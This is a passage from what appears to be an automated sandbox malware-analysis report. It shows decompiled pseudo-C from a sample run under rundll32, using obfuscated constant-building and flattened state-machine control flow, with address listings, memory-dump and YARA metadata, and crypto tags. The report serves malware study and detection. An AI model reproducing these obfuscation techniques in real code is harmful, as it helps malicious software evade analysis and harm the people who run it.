				_t444 = 0xe;
				_v1616 = _v1616 / _t444;
				_v1616 = _v1616 ^ 0x000fdd65;
				_v1600 = 0x55de88;
				_v1600 = _v1600 << 2;
				_v1600 = _v1600 ^ 0x01580110;
				do {
					while(_t396 != 0x196a97b) {
						if(_t396 == 0x2ca432c) {
							_push(_v1652);
							_push(_v1684);
							_t379 = E002DDCF7(_v1596, 0x2c10f0, __eflags);
							E002D176B( &_v1560, __eflags);
							_t382 =  *0x2e3e10; // 0x0
							_t385 =  *0x2e3e10; // 0x0
							E002DE32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
							E002CA8B0(_v1704, _t379, _v1576);
							_t449 =  &(_t449[0xf]);
							_t396 = 0x9d0e956;
							continue;
						} else {
							if(_t396 == 0x9368da1) {
								_push(_v1644);
								_push(_v1584);
								_push(_v1700);
								_push( &_v1040);
								E002D46BB(_v1692, _v1668);
								_t449 = _t449 - 0xc + 0x1c;
								_t396 = 0x196a97b;
								continue;
							} else {
								_t456 = _t396 - 0x9d0e956;
								if(_t396 != 0x9d0e956) {
									goto L10;
								} else {
									_push(_v1600);
									_push(_t436);
									_push(_t396);
									_push(_t436);
									_push(_t436);
									_push(_v1616);
									_push( &_v520);
									E002CAB87(_v1592, _v1608, _t456);
									_t436 =  !=  ? 1 : _t436;
								}
							}
						}
						L6:
						return _t436;
					}
					_push(_v1620);
					_push(_v1632);
					_t370 = E002DDCF7(_v1624, 0x2c1020, __eflags);
					E002D176B( &_v1560, __eflags);
					_t399 =  *0x2e3e10; // 0x0
					_t336 = _t399 + 0x1c; // 0x1c
					_t337 = _t399 + 0x23c; // 0x23c
					E002D1652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
					E002CA8B0(_v1640, _t370, _v1648);
					_t449 =  &(_t449[0xf]);
					_t396 = 0x9d0e956;
					L10:
					__eflags = _t396 - 0xce3b296;
				} while (__eflags != 0);
				goto L6;
			}




























































                                                                                                                                    0x002dcb65
                                                                                                                                    0x002dcb6c
                                                                                                                                    0x002dcb6e
                                                                                                                                    0x002dcb75
                                                                                                                                    0x002dcb7c
                                                                                                                                    0x002dcb7d
                                                                                                                                    0x002dcb7e
                                                                                                                                    0x002dcb83
                                                                                                                                    0x002dcb8e
                                                                                                                                    0x002dcb91
                                                                                                                                    0x002dcb9a
                                                                                                                                    0x002dcba1
                                                                                                                                    0x002dcba6
                                                                                                                                    0x002dcbb1
                                                                                                                                    0x002dcbbc
                                                                                                                                    0x002dcbc7
                                                                                                                                    0x002dcbd5
                                                                                                                                    0x002dcbd8
                                                                                                                                    0x002dcbdc
                                                                                                                                    0x002dcbe4
                                                                                                                                    0x002dcbec
                                                                                                                                    0x002dcbf4
                                                                                                                                    0x002dcbfc
                                                                                                                                    0x002dcc04
                                                                                                                                    0x002dcc0c
                                                                                                                                    0x002dcc11
                                                                                                                                    0x002dcc19
                                                                                                                                    0x002dcc21
                                                                                                                                    0x002dcc29
                                                                                                                                    0x002dcc31
                                                                                                                                    0x002dcc36
                                                                                                                                    0x002dcc3e
                                                                                                                                    0x002dcc46
                                                                                                                                    0x002dcc4e
                                                                                                                                    0x002dcc56
                                                                                                                                    0x002dcc5e
                                                                                                                                    0x002dcc66
                                                                                                                                    0x002dcc6e
                                                                                                                                    0x002dcc76
                                                                                                                                    0x002dcc7e
                                                                                                                                    0x002dcc86
                                                                                                                                    0x002dcc93
                                                                                                                                    0x002dcc97
                                                                                                                                    0x002dcc9f
                                                                                                                                    0x002dcca7
                                                                                                                                    0x002dccaf
                                                                                                                                    0x002dccb7
                                                                                                                                    0x002dccbf
                                                                                                                                    0x002dccc7
                                                                                                                                    0x002dccd4
                                                                                                                                    0x002dccd8
                                                                                                                                    0x002dcce0
                                                                                                                                    0x002dcce8
                                                                                                                                    0x002dccf0
                                                                                                                                    0x002dccfb
                                                                                                                                    0x002dcd06
                                                                                                                                    0x002dcd11
                                                                                                                                    0x002dcd19
                                                                                                                                    0x002dcd23
                                                                                                                                    0x002dcd27
                                                                                                                                    0x002dcd2f
                                                                                                                                    0x002dcd37
                                                                                                                                    0x002dcd44
                                                                                                                                    0x002dcd48
                                                                                                                                    0x002dcd50
                                                                                                                                    0x002dcd58
                                                                                                                                    0x002dcd60
                                                                                                                                    0x002dcd68
                                                                                                                                    0x002dcd75
                                                                                                                                    0x002dcd7b
                                                                                                                                    0x002dcd83
                                                                                                                                    0x002dcd8b
                                                                                                                                    0x002dcd93
                                                                                                                                    0x002dcd9b
                                                                                                                                    0x002dcda0
                                                                                                                                    0x002dcda8
                                                                                                                                    0x002dcdb0
                                                                                                                                    0x002dcdb5
                                                                                                                                    0x002dcdbd
                                                                                                                                    0x002dcdc5
                                                                                                                                    0x002dcdcd
                                                                                                                                    0x002dcdd5
                                                                                                                                    0x002dcde1
                                                                                                                                    0x002dcde4
                                                                                                                                    0x002dcde8
                                                                                                                                    0x002dcded
                                                                                                                                    0x002dcdf5
                                                                                                                                    0x002dce02
                                                                                                                                    0x002dce06
                                                                                                                                    0x002dce0e
                                                                                                                                    0x002dce16
                                                                                                                                    0x002dce1e
                                                                                                                                    0x002dce29
                                                                                                                                    0x002dce34
                                                                                                                                    0x002dce3f
                                                                                                                                    0x002dce47
                                                                                                                                    0x002dce54
                                                                                                                                    0x002dce58
                                                                                                                                    0x002dce60
                                                                                                                                    0x002dce68
                                                                                                                                    0x002dce70
                                                                                                                                    0x002dce7a
                                                                                                                                    0x002dce7d
                                                                                                                                    0x002dce81
                                                                                                                                    0x002dce89
                                                                                                                                    0x002dce91
                                                                                                                                    0x002dce99
                                                                                                                                    0x002dcea1
                                                                                                                                    0x002dcea5
                                                                                                                                    0x002dceaa
                                                                                                                                    0x002dceb2
                                                                                                                                    0x002dceba
                                                                                                                                    0x002dcec2
                                                                                                                                    0x002dceca
                                                                                                                                    0x002dcecf
                                                                                                                                    0x002dced7
                                                                                                                                    0x002dcee2
                                                                                                                                    0x002dceed
                                                                                                                                    0x002dcef8
                                                                                                                                    0x002dcf00
                                                                                                                                    0x002dcf09
                                                                                                                                    0x002dcf0e
                                                                                                                                    0x002dcf14
                                                                                                                                    0x002dcf1c
                                                                                                                                    0x002dcf24
                                                                                                                                    0x002dcf29
                                                                                                                                    0x002dcf35
                                                                                                                                    0x002dcf38
                                                                                                                                    0x002dcf3c
                                                                                                                                    0x002dcf44
                                                                                                                                    0x002dcf4c
                                                                                                                                    0x002dcf51
                                                                                                                                    0x002dcf5b
                                                                                                                                    0x002dcf65
                                                                                                                                    0x002dcf72
                                                                                                                                    0x002dcf7a
                                                                                                                                    0x002dcf7f
                                                                                                                                    0x002dcf87
                                                                                                                                    0x002dcf8f
                                                                                                                                    0x002dcf97
                                                                                                                                    0x002dcf9f
                                                                                                                                    0x002dcfa7
                                                                                                                                    0x002dcfaf
                                                                                                                                    0x002dcfbd
                                                                                                                                    0x002dcfc2
                                                                                                                                    0x002dcfcd
                                                                                                                                    0x002dcfd0
                                                                                                                                    0x002dcfd4
                                                                                                                                    0x002dcfdc
                                                                                                                                    0x002dcfe7
                                                                                                                                    0x002dcfef
                                                                                                                                    0x002dcff6
                                                                                                                                    0x002dd001
                                                                                                                                    0x002dd014
                                                                                                                                    0x002dd01b
                                                                                                                                    0x002dd026
                                                                                                                                    0x002dd02e
                                                                                                                                    0x002dd036
                                                                                                                                    0x002dd03e
                                                                                                                                    0x002dd046
                                                                                                                                    0x002dd056
                                                                                                                                    0x002dd05e
                                                                                                                                    0x002dd061
                                                                                                                                    0x002dd065
                                                                                                                                    0x002dd06d
                                                                                                                                    0x002dd075
                                                                                                                                    0x002dd07a
                                                                                                                                    0x002dd082
                                                                                                                                    0x002dd082
                                                                                                                                    0x002dd090
                                                                                                                                    0x002dd119
                                                                                                                                    0x002dd122
                                                                                                                                    0x002dd12d
                                                                                                                                    0x002dd13b
                                                                                                                                    0x002dd149
                                                                                                                                    0x002dd16e
                                                                                                                                    0x002dd19b
                                                                                                                                    0x002dd1ad
                                                                                                                                    0x002dd1b2
                                                                                                                                    0x002dd1b5
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd096
                                                                                                                                    0x002dd09c
                                                                                                                                    0x002dd0e8
                                                                                                                                    0x002dd0f3
                                                                                                                                    0x002dd0fa
                                                                                                                                    0x002dd109
                                                                                                                                    0x002dd10a
                                                                                                                                    0x002dd10f
                                                                                                                                    0x002dd112
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd09e
                                                                                                                                    0x002dd09e
                                                                                                                                    0x002dd0a0
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd0a6
                                                                                                                                    0x002dd0a6
                                                                                                                                    0x002dd0b1
                                                                                                                                    0x002dd0b2
                                                                                                                                    0x002dd0b3
                                                                                                                                    0x002dd0b4
                                                                                                                                    0x002dd0b5
                                                                                                                                    0x002dd0ca
                                                                                                                                    0x002dd0cb
                                                                                                                                    0x002dd0d8
                                                                                                                                    0x002dd0d8
                                                                                                                                    0x002dd0a0
                                                                                                                                    0x002dd09c
                                                                                                                                    0x002dd0db
                                                                                                                                    0x002dd0e7
                                                                                                                                    0x002dd0e7
                                                                                                                                    0x002dd1bc
                                                                                                                                    0x002dd1c5
                                                                                                                                    0x002dd1cd
                                                                                                                                    0x002dd1db
                                                                                                                                    0x002dd212
                                                                                                                                    0x002dd21f
                                                                                                                                    0x002dd223
                                                                                                                                    0x002dd22e
                                                                                                                                    0x002dd243
                                                                                                                                    0x002dd248
                                                                                                                                    0x002dd24b
                                                                                                                                    0x002dd24d
                                                                                                                                    0x002dd24d
                                                                                                                                    0x002dd24d
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                                    • API String ID: 1514166925-553023378
                                                                                                                                    • Opcode ID: 99ab995539dbf5a20ac88a5fe9f26969766ea8fca112e78c1e96ca737ca57872
                                                                                                                                    • Instruction ID: aa8d17ce6ed48d7257e9a2c22dfef5707f48bad2cadcb6172f315913a23820e9
                                                                                                                                    • Opcode Fuzzy Hash: 99ab995539dbf5a20ac88a5fe9f26969766ea8fca112e78c1e96ca737ca57872
                                                                                                                                    • Instruction Fuzzy Hash: 5B022FB15083819FD364CF25C98AA9BFBE1FBC4708F10891EF1D986260D7B1895ACF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C70B3 Relevance: 10.3, Strings: 8, Instructions: 273COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C70B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t276;
				intOrPtr _t301;
				void* _t302;
				intOrPtr _t305;
				void* _t306;
				intOrPtr _t312;
				intOrPtr* _t314;
				void* _t316;
				intOrPtr _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int* _t352;

				_t342 = _a4;
				_t314 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t276);
				_v8 = 0xc5496b;
				_t340 = 0;
				_v4 = 0;
				_t352 =  &(( &_v128)[5]);
				_v96 = 0xa893e5;
				_v96 = _v96 >> 0xb;
				_t316 = 0x77ea95;
				_v96 = _v96 ^ 0xaec74c08;
				_v96 = _v96 + 0xffff5908;
				_v96 = _v96 ^ 0xaec6b223;
				_v120 = 0x460837;
				_v120 = _v120 << 0xe;
				_t343 = 0x61;
				_v120 = _v120 / _t343;
				_v120 = _v120 ^ 0xba448c5d;
				_v120 = _v120 ^ 0xbb13b056;
				_v100 = 0x5f60bb;
				_t344 = 0x67;
				_v100 = _v100 / _t344;
				_v100 = _v100 << 2;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xed0e0000;
				_v104 = 0xcda695;
				_t345 = 0x65;
				_v104 = _v104 * 0x11;
				_v104 = _v104 + 0xffffbfc8;
				_v104 = _v104 / _t345;
				_v104 = _v104 ^ 0x00229cab;
				_v88 = 0xcb9151;
				_v88 = _v88 + 0x59e9;
				_v88 = _v88 ^ 0x7c8ac0da;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x0007c412;
				_v124 = 0xc27732;
				_v124 = _v124 << 5;
				_v124 = _v124 * 0x69;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x0007c2e3;
				_v108 = 0xd451e;
				_v108 = _v108 | 0x03d9c36b;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x018efe00;
				_v24 = 0xe3266e;
				_v24 = _v24 ^ 0xb39ac5a6;
				_v24 = _v24 ^ 0xb37ebd00;
				_v60 = 0xdd6dbc;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00066ea0;
				_v92 = 0xdc27c1;
				_v92 = _v92 ^ 0xb7b3afa8;
				_t346 = 0x51;
				_v92 = _v92 / _t346;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x000e15f4;
				_v28 = 0x55985f;
				_t347 = 0x64;
				_v28 = _v28 * 0x1f;
				_v28 = _v28 ^ 0x0a58c7ef;
				_v64 = 0x4cb0ae;
				_v64 = _v64 * 0x59;
				_v64 = _v64 + 0xffff44f7;
				_v64 = _v64 ^ 0x1aa02a50;
				_v32 = 0x4c255b;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000ba021;
				_v68 = 0x1bdf1a;
				_v68 = _v68 << 0xe;
				_v68 = _v68 << 8;
				_v68 = _v68 ^ 0xc683e60f;
				_v36 = 0xeace7c;
				_v36 = _v36 ^ 0x32d1e31b;
				_v36 = _v36 ^ 0x32395a0e;
				_v52 = 0x5778bf;
				_v52 = _v52 * 0x53;
				_v52 = _v52 ^ 0x1c501c28;
				_v56 = 0x56e07;
				_v56 = _v56 / _t347;
				_v56 = _v56 ^ 0x000a0e4e;
				_v128 = 0x2ec397;
				_v128 = _v128 + 0xffff4016;
				_v128 = _v128 ^ 0xc29a5f5c;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xd1754ce1;
				_v112 = 0x486dea;
				_t159 =  &_v112; // 0x486dea
				_t348 = 0x16;
				_v112 =  *_t159 * 0x75;
				_v112 = _v112 << 3;
				_v112 = _v112 + 0xffff4e4a;
				_v112 = _v112 ^ 0x08d01f1a;
				_v116 = 0xad5672;
				_v116 = _v116 << 0xa;
				_v116 = _v116 * 0x32;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x35c1a461;
				_v40 = 0x750aef;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x42b6a378;
				_v72 = 0x7e8fee;
				_v72 = _v72 << 0xe;
				_v72 = _v72 + 0x885b;
				_v72 = _v72 ^ 0xa3f43c0d;
				_v44 = 0x717d1a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x000f68d6;
				_v48 = 0x815897;
				_v48 = _v48 / _t348;
				_v48 = _v48 ^ 0x000d4a68;
				_v76 = 0xfbb4ce;
				_v76 = _v76 << 8;
				_v76 = _v76 + 0xffffed69;
				_v76 = _v76 ^ 0xfbbe0169;
				_v80 = 0xf07394;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x34c45092;
				_v80 = _v80 ^ 0x0d009df4;
				_v84 = 0xfdde74;
				_v84 = _v84 * 0x78;
				_v84 = _v84 << 7;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x8cc67a91;
				_v20 = 0xbaf80d;
				_t349 = 0x4e;
				_v20 = _v20 / _t349;
				_v20 = _v20 ^ 0x000183d9;
				do {
					while(_t316 != 0x77ea95) {
						if(_t316 == 0x220b753) {
							_t301 =  *0x2e3dfc; // 0x0
							_t302 = E002D5B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
							_t352 =  &(_t352[0x10]);
							if(_t302 == _v88) {
								_t316 = 0xd86d689;
								continue;
							}
						} else {
							if(_t316 == 0xd7ced6e) {
								_t305 =  *0x2e3dfc; // 0x0
								_t306 = E002D5B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
								_t352 =  &(_t352[0x10]);
								if(_t306 == _v108) {
									 *_t314 = _v16;
									_t340 = 1;
									 *((intOrPtr*)(_t314 + 4)) = _v12;
								} else {
									_t316 = 0xf392ab6;
									continue;
								}
							} else {
								if(_t316 == 0xd86d689) {
									_push(_t316);
									_push(_t316);
									_t312 = E002C7FF2(_v12);
									_v16 = _t312;
									if(_t312 != 0) {
										_t316 = 0xd7ced6e;
										continue;
									}
								} else {
									if(_t316 != 0xf392ab6) {
										goto L14;
									} else {
										E002D8519(_v84, _v20, _v16);
									}
								}
							}
						}
						L17:
						return _t340;
					}
					_t316 = 0x220b753;
					L14:
				} while (_t316 != 0xf4b6a65);
				goto L17;
			}




















































                                                                                                                                    0x002c70bc
                                                                                                                                    0x002c70c3
                                                                                                                                    0x002c70c6
                                                                                                                                    0x002c70cd
                                                                                                                                    0x002c70d4
                                                                                                                                    0x002c70d5
                                                                                                                                    0x002c70d6
                                                                                                                                    0x002c70d7
                                                                                                                                    0x002c70dc
                                                                                                                                    0x002c70e7
                                                                                                                                    0x002c70e9
                                                                                                                                    0x002c70f0
                                                                                                                                    0x002c70f3
                                                                                                                                    0x002c70fd
                                                                                                                                    0x002c7102
                                                                                                                                    0x002c7107
                                                                                                                                    0x002c710f
                                                                                                                                    0x002c7117
                                                                                                                                    0x002c711f
                                                                                                                                    0x002c7127
                                                                                                                                    0x002c7132
                                                                                                                                    0x002c7137
                                                                                                                                    0x002c713d
                                                                                                                                    0x002c7145
                                                                                                                                    0x002c714d
                                                                                                                                    0x002c7159
                                                                                                                                    0x002c715e
                                                                                                                                    0x002c7164
                                                                                                                                    0x002c7169
                                                                                                                                    0x002c716e
                                                                                                                                    0x002c7176
                                                                                                                                    0x002c7183
                                                                                                                                    0x002c7186
                                                                                                                                    0x002c718a
                                                                                                                                    0x002c7198
                                                                                                                                    0x002c719c
                                                                                                                                    0x002c71a4
                                                                                                                                    0x002c71ac
                                                                                                                                    0x002c71b4
                                                                                                                                    0x002c71bc
                                                                                                                                    0x002c71c1
                                                                                                                                    0x002c71c9
                                                                                                                                    0x002c71d1
                                                                                                                                    0x002c71db
                                                                                                                                    0x002c71df
                                                                                                                                    0x002c71e4
                                                                                                                                    0x002c71ec
                                                                                                                                    0x002c71f4
                                                                                                                                    0x002c71fc
                                                                                                                                    0x002c7201
                                                                                                                                    0x002c7206
                                                                                                                                    0x002c720e
                                                                                                                                    0x002c7216
                                                                                                                                    0x002c721e
                                                                                                                                    0x002c7226
                                                                                                                                    0x002c722e
                                                                                                                                    0x002c7233
                                                                                                                                    0x002c7238
                                                                                                                                    0x002c7240
                                                                                                                                    0x002c7248
                                                                                                                                    0x002c7256
                                                                                                                                    0x002c725b
                                                                                                                                    0x002c7261
                                                                                                                                    0x002c7266
                                                                                                                                    0x002c726e
                                                                                                                                    0x002c727b
                                                                                                                                    0x002c727e
                                                                                                                                    0x002c7282
                                                                                                                                    0x002c728a
                                                                                                                                    0x002c7297
                                                                                                                                    0x002c729b
                                                                                                                                    0x002c72a3
                                                                                                                                    0x002c72ab
                                                                                                                                    0x002c72b3
                                                                                                                                    0x002c72b8
                                                                                                                                    0x002c72c0
                                                                                                                                    0x002c72c8
                                                                                                                                    0x002c72cd
                                                                                                                                    0x002c72d2
                                                                                                                                    0x002c72da
                                                                                                                                    0x002c72e2
                                                                                                                                    0x002c72ea
                                                                                                                                    0x002c72f2
                                                                                                                                    0x002c72ff
                                                                                                                                    0x002c7303
                                                                                                                                    0x002c730b
                                                                                                                                    0x002c731b
                                                                                                                                    0x002c731f
                                                                                                                                    0x002c7327
                                                                                                                                    0x002c732f
                                                                                                                                    0x002c7337
                                                                                                                                    0x002c733f
                                                                                                                                    0x002c7344
                                                                                                                                    0x002c734c
                                                                                                                                    0x002c7354
                                                                                                                                    0x002c7359
                                                                                                                                    0x002c735a
                                                                                                                                    0x002c735e
                                                                                                                                    0x002c7363
                                                                                                                                    0x002c736b
                                                                                                                                    0x002c7373
                                                                                                                                    0x002c737b
                                                                                                                                    0x002c7385
                                                                                                                                    0x002c7389
                                                                                                                                    0x002c738d
                                                                                                                                    0x002c7395
                                                                                                                                    0x002c739d
                                                                                                                                    0x002c73a2
                                                                                                                                    0x002c73aa
                                                                                                                                    0x002c73b2
                                                                                                                                    0x002c73b7
                                                                                                                                    0x002c73bf
                                                                                                                                    0x002c73c7
                                                                                                                                    0x002c73cf
                                                                                                                                    0x002c73d4
                                                                                                                                    0x002c73dc
                                                                                                                                    0x002c73ea
                                                                                                                                    0x002c73ee
                                                                                                                                    0x002c73f6
                                                                                                                                    0x002c73fe
                                                                                                                                    0x002c7403
                                                                                                                                    0x002c740b
                                                                                                                                    0x002c7413
                                                                                                                                    0x002c741b
                                                                                                                                    0x002c7420
                                                                                                                                    0x002c7428
                                                                                                                                    0x002c7430
                                                                                                                                    0x002c743d
                                                                                                                                    0x002c7443
                                                                                                                                    0x002c7448
                                                                                                                                    0x002c744d
                                                                                                                                    0x002c7455
                                                                                                                                    0x002c7463
                                                                                                                                    0x002c746b
                                                                                                                                    0x002c746f
                                                                                                                                    0x002c7477
                                                                                                                                    0x002c7477
                                                                                                                                    0x002c7485
                                                                                                                                    0x002c7592
                                                                                                                                    0x002c75a6
                                                                                                                                    0x002c75ab
                                                                                                                                    0x002c75b2
                                                                                                                                    0x002c75b4
                                                                                                                                    0x00000000
                                                                                                                                    0x002c75b4
                                                                                                                                    0x002c748b
                                                                                                                                    0x002c7491
                                                                                                                                    0x002c7531
                                                                                                                                    0x002c7542
                                                                                                                                    0x002c7547
                                                                                                                                    0x002c754e
                                                                                                                                    0x002c75d7
                                                                                                                                    0x002c75d9
                                                                                                                                    0x002c75e1
                                                                                                                                    0x002c7550
                                                                                                                                    0x002c7550
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7550
                                                                                                                                    0x002c7493
                                                                                                                                    0x002c7499
                                                                                                                                    0x002c74d4
                                                                                                                                    0x002c74d5
                                                                                                                                    0x002c74d6
                                                                                                                                    0x002c74db
                                                                                                                                    0x002c74e6
                                                                                                                                    0x002c74ec
                                                                                                                                    0x00000000
                                                                                                                                    0x002c74ec
                                                                                                                                    0x002c749b
                                                                                                                                    0x002c74a1
                                                                                                                                    0x00000000
                                                                                                                                    0x002c74a7
                                                                                                                                    0x002c74b6
                                                                                                                                    0x002c74bb
                                                                                                                                    0x002c74a1
                                                                                                                                    0x002c7499
                                                                                                                                    0x002c7491
                                                                                                                                    0x002c75e4
                                                                                                                                    0x002c75f0
                                                                                                                                    0x002c75f0
                                                                                                                                    0x002c75be
                                                                                                                                    0x002c75c0
                                                                                                                                    0x002c75c0
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                                    • API String ID: 0-2314355462
                                                                                                                                    • Opcode ID: a7d199f37f794812b41b210ee33796aabcb67c9d3ea17cd18f3232093e83412d
                                                                                                                                    • Instruction ID: 6e389d437b9e90879e96a11e895af8ba2809960a42d3a98e89180445eace30ab
                                                                                                                                    • Opcode Fuzzy Hash: a7d199f37f794812b41b210ee33796aabcb67c9d3ea17cd18f3232093e83412d
                                                                                                                                    • Instruction Fuzzy Hash: 8AD10D7111C3819FC764CF65C889A1BBBF2BBC4748F50891DF6A68A220C7B6C959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DF435 Relevance: 9.3, Strings: 7, Instructions: 536COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002DF435(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				void* _t551;
				void* _t554;
				signed int _t560;
				void* _t563;
				int _t566;
				void* _t580;
				signed int* _t582;
				void* _t587;
				signed int _t595;
				void* _t598;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				intOrPtr* _t610;
				signed int _t634;
				void* _t659;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				void* _t682;
				void* _t683;
				void* _t686;
				void* _t687;
				signed int _t692;
				signed int _t693;
				signed int* _t694;
				void* _t698;

				_t694 =  &_v520;
				_v296 = __edx;
				_v456 = __ecx;
				_v308 = 0x7c82e0;
				_v308 = _v308 ^ 0x9529f8b7;
				_v308 = _v308 ^ 0x95557a57;
				_v444 = 0xbd655a;
				_v444 = _v444 + 0x6586;
				_v444 = _v444 + 0xffff1486;
				_v444 = _v444 ^ 0x00b10b5d;
				_v360 = 0x6df28f;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0xc93a0f00;
				_v360 = _v360 ^ 0xc93b57a7;
				_v380 = 0x803da4;
				_v380 = _v380 + 0x81b0;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xbf59b73f;
				_v484 = 0xdeaf13;
				_v484 = _v484 | 0x05ba16e8;
				_v484 = _v484 + 0xffff5e7b;
				_v484 = _v484 + 0x21a5;
				_v484 = _v484 ^ 0x05f35408;
				_v516 = 0x9c12e3;
				_v516 = _v516 >> 5;
				_v516 = _v516 + 0x3879;
				_t686 = 0x618a3a9;
				_t676 = 0x46;
				_v516 = _v516 / _t676;
				_v516 = _v516 ^ 0x000beb5e;
				_v404 = 0x49e9fe;
				_v404 = _v404 + 0x1375;
				_v404 = _v404 | 0x014362a3;
				_v404 = _v404 ^ 0x01430578;
				_v408 = 0xd49d0c;
				_v408 = _v408 + 0x89ee;
				_v408 = _v408 | 0xbbfa4d8a;
				_v408 = _v408 ^ 0xbbf95772;
				_v504 = 0x33cefe;
				_v504 = _v504 >> 0xa;
				_v504 = _v504 >> 0xd;
				_v504 = _v504 + 0xffff4738;
				_v504 = _v504 ^ 0xfff61340;
				_v388 = 0x38423a;
				_t75 =  &_v388; // 0x38423a
				_t601 = 0x7b;
				_v388 =  *_t75 * 0x2c;
				_v388 = _v388 + 0x7a90;
				_v388 = _v388 ^ 0x09a92ca6;
